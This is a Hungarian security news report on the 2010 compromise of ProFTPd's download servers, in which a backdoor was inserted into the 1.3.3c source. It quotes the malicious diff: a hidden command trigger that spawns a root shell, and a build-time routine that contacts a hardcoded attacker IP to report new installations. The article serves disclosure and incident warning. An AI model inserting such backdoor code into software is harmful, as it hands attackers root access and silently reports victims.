Feltörték a ProFTPd FTP kiszolgáló szervereit és hátsó kaput helyeztek el a szoftver forráskódjában. Aki november 28. és december 2. között letöltötte és telepítette az 1.3.3c verziót, az sürgősen nézze át a rendszereit!

A módosított démon root shellt indít, ha az "ACIDBITCHEZ" parancsról kérünk segítséget és fordításkor jelez a támadóknak arról, hogy egy újabb felhasználó telepíti a módosított szoftvert.

+ if (strcmp(target, "ACIDBITCHEZ") == 0) { \
  setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+
+int sock;
+
+void handle_timeout(int sig)
+{
+    close(sock);
+    exit(0);
+}
+
+int main(void)
+{
+
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="212.26.42.47";
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, \
            sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+
+return 0; }

A támadók nem módosították a letölthető fájlokhoz kiadott MD5 lenyomatokat illetve PGP aláírásokat, így aki ezeket ellenőrizte, észrevehette a turpisságot.

A forráskódokat hosztoló szerverhez valószínűleg az FTP szolgáltatás hibáján keresztül sikerült hozzáférni. Érdekes egybeesés, hogy a Phrack#67-ben (Phrack Profile egy ex-Ac1dB1tch3z tagról...) pont lehozták egy olyan ProFTPd mod_sql bug leírását, amit ugyan bizonyos szinten orvosolt egy másik hibajavítás, de a szerző nem zárta ki, hogy a rés kihasználható maradt...